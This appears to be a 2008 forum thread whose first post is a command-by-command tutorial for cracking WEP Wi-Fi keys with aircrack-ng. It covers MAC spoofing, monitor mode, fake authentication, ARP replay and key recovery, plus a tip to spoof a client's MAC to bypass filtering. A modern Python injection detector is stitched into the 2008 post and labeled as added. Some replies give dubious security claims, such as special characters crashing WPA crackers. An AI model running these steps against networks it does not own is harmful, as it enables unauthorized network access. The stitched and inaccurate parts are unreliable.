
Cracking your own WEP Network to test security

27 replies to this topic

#1 phpforfun


Posted 04 November 2008 - 05:33 PM

This is a short tutorial showing you how to secure your own WEP network. First let me say, the only 100% sure way to secure your wireless network is to disable wireless, but if you use it, then you can't.

What is WEP?
Wired Equivalent Privacy (WEP) is a security protocol for wireless networks that encrypts transmitted data. It's easy to configure. Without any security your data can be intercepted without difficulty.
Please do not confuse this with WPA. WPA is Wi-Fi Protected Access, a security standard for wireless networks. This requires a password, NOT a key.

1) Can you even do it?
First we need to be sure your wireless card can support packet injection. I used my Acer Aspire 5920. It comes with an 802.11a/b/g WLAN wireless card. It can't do packet injection. Thus I purchased the Hawking HWUG1 wireless card. Hard to come by, but one of the best out there. Best Buy has them for $40, give or take.

2) Install the software
Some people like to use the BackTrack Live OS, which to me is pointless, unless you don't want to install Linux and use it as your everyday running operating system. You need 2 things to do this: macchanger and aircrack-ng.

Commands:
Make yourself the root user:
[QUOTE]sudo -s[/QUOTE]
Install Aircrack
[QUOTE]apt-get install aircrack-ng[/QUOTE]
Install macchanger
[QUOTE]apt-get install macchanger[/QUOTE]
There! You have the 2 programs that make it easy to continue.

3) Verify you can use injection
Open the terminal and type iwconfig. It will show you your network cards.
You will see I have 2 wireless cards, wlan0 and rausb0. wlan0 is what won't work, so we need to disable that; rausb0 is the wireless card I purchased.
Type the following command:
[QUOTE]aireplay-ng --test rausb0[/QUOTE]
That will show the following result.
If it doesn't, you need to get a wireless card that works.

4) Spoof mac and put your wireless card into monitor mode
I will list the commands and what they do. You don't NEED to spoof your MAC, but it sure makes it a lot easier to remember.

We don't need wlan0, so let's disable it.
[QUOTE]ifconfig wlan0 down[/QUOTE]
We need to disable rausb0 as well, so we can modify it.
[QUOTE]ifconfig rausb0 down[/QUOTE]
Change your MAC (it can be whatever you want, as long as it looks like ##:##:##:##:##:##).
[QUOTE]macchanger --mac 00:11:22:33:44:55 rausb0[/QUOTE]
The below commands are used for the Hawking wireless card only; I believe they enable the drivers for the wireless card.
[QUOTE]modprobe -r rt73
modprobe rt73[/QUOTE]
Bring up rausb0 for use.
[QUOTE]ifconfig rausb0 up[/QUOTE]
Modify the bit rate of rausb0 to 1 Mb/s.
[QUOTE]iwconfig rausb0 rate 1M[/QUOTE]
Confirm the bit rate.
[QUOTE]iwconfig rausb0[/QUOTE]
Enable rausb0 for use.
[QUOTE]airmon-ng start rausb0[/QUOTE]
Here is a screenshot of me doing all of that (don't mind the typo).
You are now ready to begin!

5) Monitor the wireless networks around you, choose your target
Type the following command into your terminal:
[QUOTE]airodump-ng rausb0[/QUOTE]
This will monitor the wireless networks around you, as well as the stations connected to them.
You will notice the command will display pretty much everything you need. We will attack 2WIRE (my wireless LAN). Notice it's WEP, and it's on channel 6. I have highlighted the BSSID.
NOTE: Looking at the screenshot, you will notice it shows the stations connected to BSSIDs. This is why MAC filtering is pointless: if they can connect and you can't, spoof your MAC to theirs, and chances are it will let you in. If the station's connected BSSID is blank, that means he's looking or trying to connect to a BSSID, but has not yet.

6) Run Airodump-ng
Once you have selected your target, you can monitor the data packets it is sending out.
Type the below command into the terminal:
[QUOTE]airodump-ng -c 6 -w 2wire --bssid 00:12:88:FE:7A:21 rausb0[/QUOTE]
-c will specify the channel the BSSID is on; 2WIRE is on 6.
-w will write the packet data to a file; I chose to name the file 2wire.
--bssid will specify the BSSID you are trying to connect to.
NOTE: LEAVE THIS RUNNING! Open a new terminal tab, and sudo -s again as admin.
Notice how the Data column says 0? It will climb to 5000 to 10000 packets. If you can't even hit 5000, then your signal isn't good enough. This may take time; it can take anywhere from 2 minutes to 30 minutes. Be patient.

7) Fake Authentication with Access Point
Type the below command in the terminal:
[QUOTE]aireplay-ng -1 0 -a 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0[/QUOTE]
-a forces attack mode.
-h is the host; that is your MAC.
The authentication must read successful in order for you to continue. I have had to run this command a few times to get it to be successful.

8) Run Aireplay with -3 (start aireplay-ng in ARP Request Replay Mode)

Type the below command into the terminal:
[QUOTE]aireplay-ng -3 -b 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0[/QUOTE]
NOTE: Open a new tab again! Let this run as well!!

9) LAST STEP! Decrypt the packet data
If you go into the terminal and type "ls /home", you will see some .cap files. I named my log 2wire, thus it will be "2wire-01.cap".
Type the following command into the terminal:
[QUOTE]aircrack-ng -n 64 --bssid 00:12:88:FE:7A:21 2wire-01.cap[/QUOTE]
Hope it has enough data to decrypt; if not, it will say please wait and try later.

SUCCESS!
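From the defender's side, the two injection steps above (repeated fake authentication and ARP request replay) are loud: a single MAC re-authenticating several times and then pushing thousands of ARP requests in a few minutes looks nothing like a real client. The following added example (not code from the post, and not part of aircrack-ng) runs a rate-based check over a constructed frame log; the MACs, frame kinds and thresholds are assumptions.

```python
"""Rate-based detection of the injection patterns in the tutorial above
(fake-authentication retries and ARP request replay), run over a constructed
wireless frame log. Added example for a monitoring station; not from the post."""
from collections import defaultdict

# Constructed sample log: (timestamp_seconds, source_mac, frame_kind).
# frame_kind is "auth" for an 802.11 authentication request and "arp" for an
# ARP request carried in a data frame. The MACs are made-up placeholders.
SAMPLE_LOG = (
    # a normal client: one authentication, a few ARP requests over a minute
    [(0.0, "aa:aa:aa:00:00:01", "auth")]
    + [(5.0 + 10 * i, "aa:aa:aa:00:00:01", "arp") for i in range(6)]
    # a spoofed MAC retrying authentication until the AP accepts it
    + [(20.0 + 0.5 * i, "00:11:22:33:44:55", "auth") for i in range(5)]
    # the same MAC replaying one ARP request at roughly 100 frames/second
    + [(30.0 + 0.01 * i, "00:11:22:33:44:55", "arp") for i in range(300)]
)

# Thresholds are assumptions, not figures from the post: a real client sends
# one authentication per association and far fewer than 20 ARP requests/s.
THRESHOLDS = {"auth": (10.0, 3), "arp": (1.0, 20)}  # kind -> (window_s, max)


def peak_rate(timestamps, window_s):
    """Largest number of events inside any window of window_s seconds
    (two-pointer sliding window over the sorted timestamps)."""
    ts = sorted(timestamps)
    best, start = 0, 0
    for end, t in enumerate(ts):
        while t - ts[start] > window_s:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_injection(log, thresholds=THRESHOLDS):
    """Return {mac: [(kind, peak_count), ...]} for MACs that exceed a threshold."""
    per_key = defaultdict(list)
    for t, mac, kind in log:
        per_key[(mac, kind)].append(t)
    alerts = defaultdict(list)
    for (mac, kind), ts in per_key.items():
        window_s, limit = thresholds[kind]
        peak = peak_rate(ts, window_s)
        if peak > limit:
            alerts[mac].append((kind, peak))
    return dict(alerts)


if __name__ == "__main__":
    for mac, hits in detect_injection(SAMPLE_LOG).items():
        for kind, peak in hits:
            print(f"ALERT {mac}: {peak} {kind} frames in one window")
```

The spoofed MAC trips both checks while the normal client trips neither; the ARP threshold is deliberately far below the rate the tutorial needs to collect 5000 to 10000 data frames in minutes.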

#2 Zapper


Posted 04 November 2008 - 06:24 PM

Interesting, +rep, I will try this later.

#3 phpforfun


Posted 04 November 2008 - 06:38 PM

Thanks!

#4 Guest_Jordan_*


Posted 05 November 2008 - 06:57 AM

Excellent tutorial phpforfun, +rep.

What do you recommend for making your wireless network more secure?

#5 phpforfun


Posted 05 November 2008 - 11:54 AM

[QUOTE]Excellent tutorial phpforfun, +rep.

What do you recommend for making your wireless network more secure?[/QUOTE]

Great question, I should have posted that in the main post.

WPA, alphanumeric with a special character in it. The only program I know that can be used to crack WPA/WPA2 passwords will crash if it has a special char put in the password list. :)

#6 Xav


Posted 05 November 2008 - 12:00 PM

It depends on what you consider to be a special character. I consider the character "X" to be special, for instance.

#7 phpforfun


Posted 05 November 2008 - 12:20 PM

[QUOTE]It depends on what you consider to be a special character. I consider the character "X" to be special, for instance.[/QUOTE]

Glossary

[QUOTE]Special Character
A non-numeric character not in the a-z alphabet. Common examples include ~!@#$%^&* ()_+=-`';/.,?><:"|}{\ In the context of the required Special Character for Complex Passwords, it is recommended that you do not use: @, %, ^, &, {, ~, <, or punctuation marks (such as: !, ?, ., :, ;, ', ", ,.)[/QUOTE]

You would be wrong.

#8 Xav


Posted 05 November 2008 - 12:32 PM

I don't care what albany.edu says. I still consider the "X" character to be rather special.

#9 phpforfun


Posted 05 November 2008 - 03:46 PM

Some people would say the same about you. ;)

#10 Guest_Jordan_*


Posted 05 November 2008 - 06:16 PM

And why is X special to you?

#11 TkTech


Posted 05 November 2008 - 07:20 PM

Actually, WPA is almost the exact same as WEP. It was a hasty patch to known side channels in WEP. WPA2 is a complete rewrite and usually safe.

WEP Enterprise with a RADIUS server with a custom MAC hash algorithm FTW.

#12 phpforfun


Posted 05 November 2008 - 11:36 PM

WPA/WPA2 and WEP are 100% different to crack.

WEP is a key, WPA is a password.